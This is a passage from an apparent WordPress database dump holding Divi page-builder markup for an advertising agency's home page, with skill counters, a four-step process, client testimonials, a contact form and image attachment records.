src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”\n[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 19:43:56','2020-08-08 19:43:56','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(693,1,'2020-08-08 19:53:52','2020-08-08 19:53:52','Client Testimonial','Client Testimonial','','inherit','open','closed','','artboard-3','','','2020-08-08 19:54:18','2020-08-08 19:54:18','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.png',0,'attachment','image/png',0),(695,1,'2020-08-08 19:59:03','2020-08-08 19:59:03','','Client Testimonial digital','','inherit','open','closed','','artboard-copy-3','','','2020-08-08 19:59:33','2020-08-08 19:59:33','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png',0,'attachment','image/png',0),(696,1,'2020-08-08 19:59:53','2020-08-08 19:59:53','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" 